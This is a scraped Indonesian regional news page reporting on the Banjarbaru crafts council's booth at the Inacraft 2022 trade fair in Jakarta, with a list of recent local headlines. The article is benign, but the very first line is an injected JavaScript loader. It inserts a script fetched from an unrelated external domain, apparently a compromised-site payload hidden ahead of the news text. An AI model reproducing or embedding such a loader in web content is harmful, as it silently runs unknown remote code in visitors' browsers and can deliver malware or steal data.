(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Dekranasda Banjarbaru Tampil di Inacraft 2022, Ini Produk Kerajinan UMKM yang Ditawarkan


KANALKALIMANTAN.COM, JAKARTA – The 22nd Jakarta Internasional Handicraft Trade Fair (Inacraft) 2022 yang digelar di Jakarta Convention Center (JCC) selama 23-27 Maret 2022 berlangsung sangat meriah, dibuka langsung oleh Presiden RI Joko Widodo pada Rabu (23/3/2022) pagi, pagelaran yang menampilkan produk kerajinan dan UMKM di seluruh Indonesia ini menjadi momen kebangkitan ekonomi Indonesia, yang sempat terpuruk akibat pandemi covid-19. Dewan Kerajinan Nasional Daerah (Dekranasda) Kota Banjarbaru tak ketinggalan mengikuti event nasional ini untuk mempromosikan produk-produk perajin dan UMKM di Kota Banjarbaru.

Pada event ini, Jokowi hadir sekaligus membuka acara didampingi Menteri Sekretaris Negara Pratikno, Menteri Perdagangan Muhammad Lutfi, Menteri Pariwisata dan Ekonomi Kreatif Sandiaga Uno, dan Menteri Koperasi dan UKM Teten Masduki. Beliau mengucapkan selamat atas terselenggara kembali Inacraft yang sempat vakum 2 tahun akibat pandemi Covid-19.

“Saya ingin menyampaikan selamat atas diselenggarakannya kembali Inacraft. Inacraft tahun 2022 yang menampilkan produk-produk kerajinan yang memiliki kualitas terbaik dari kreasi-kreasi para pengrajin kita,” kata Jokowi dalam Kanal YouTube Sekretariat Presiden.

Dekranasda Banjarbaru mengikuti event ini membawa produk-produk kerajinan yaitu tas rajut Bhanjaruu Bags, pakaian dan kain sasirangan, berbagai anyaman purun, lampit dan pernak-pernik lainnya.

 

 

Baca juga: Tiga Nama Pemilik Tempat Penimbunan CPO Ilegal, Polres Tanbu Belum Tetapkan Tersangka

Pada hari pertama berlangsungnya event ini, stand Dekranasda Kota Banjarbaru ramai dikunjungi pengunjung, salah satunya Ketua Dekranasda Bukit Tinggi Fiona Agyta, yang sangat mengagumi Ketua Dekranasda Kota Banjarbaru Vivi Mar’i Zubedi, karena berkat karya dan usahanya. Dekranasda Kota Banjarbaru menjadi sangat terkenal, apalagi setelah mengikuti Paris Fashion Show 2022 pada Minggu (6/3/2022) lalu.

“Alhamdulillah hari ini berkunjung ke Banjarbaru dan menemukan baju sasirangan ini, kebetulan saya ngefans banget sama bu Vivi, selamat semoga laku di Inacraft semuanya,” ujar Ketua Dekranasda Bukit Tinggi Fiona Agyta setelah membeli kain sasirangan produk Dekranasda Banjarbaru.

Ketua Dekranasda Bukit Tinggi Fiona Agyta sedang memilih kain sasirangan. Foto: medcenbjb/oriz  

Pujian juga datang dari H Kusma Erizal Ginting, Ketua Dekranasda Kota Pematang Siantar.

“Saya dengar luar biasa ini Banjarbaru, sudah go internasional,” katanya ketika singgah di stand Dekranasda Kota Banjarbaru.

Sementara itu, Asisten Perekonomian, Pembangunan dan Kesra Setdako Banjarbaru, Ir Hj Puspa Kencana MP yang turut ikut dalam event Inacraft 2022 mengatakan, pada hari pertama pagelaran, produk kain sasirangan dari Dekranasda Banjarbaru menarik minat pengunjung.

Baca juga: Menteri ESDM: Program Dedieselisasi PLN Kunci RI Capai Net Zero Emission pada 2060

“Ini gelaran besar di Indonesia bahkan Asia, yang mana menampilkan hasil-hasil kerajinan dan UMKM, untuk Kota Banjarbaru ternyata kain sasirangan yang paling disenangi oleh pengunjung di sini,” tuturnya.

Produk tas rajut Bhanjaruu Bags tak luput dari perhatian, salah satu pengunjung bernama Anisa dengan lugas menyatakan tas Bhanjaruu Bags sangat keren dan yang paling unik.

“Datang ke stand Banjarbaru langsung suka sama display tas Bhanjaruu Bags ini soalnya warnanya itu cemerlang semua dan keren banget warna-warnanya itu unik, antara semua barang-barang, ini yang paling unik, modern,” kata Anisa, wanita dari Tangerang Selatan.

Untuk diketahui, lebih dari 800 stand berpartisipasi mengikuti event Inacraft ini, pengunjung tidak dipungut biaya, dan harus menerapkan protokol kesehatan selama berada di Jakarta Convention Center (JCC).

Mengikuti event The 22nd Jakarta Internasional Handicraft Trade Fair (Inacraft) 2022, produk-produk Dekranasda Kota Banjarbaru menjadi lebih terkenal dan semakin banyak diminati, sehingga perekonomian Kota Banjarbaru akan semakin maju. (Kanalkalimantan.com/al)

Reporter : al
Editor : bie


Risa

Recent Posts

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

14 menit ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

20 menit ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

43 menit ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

52 menit ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

1 jam ago

Sempat Sengat Pelajar Madrasah, Sarang Tawon Dalam Kelas Dievakuasi Damkar HSU

KANALKALIMANTAN.COM, AMUNTAI - Khawatir membahayakan para pelajar, sarang tawon berukuran sedang berhasil dievakuasi petugas Pemadam… Read More

4 jam ago

This website uses cookies.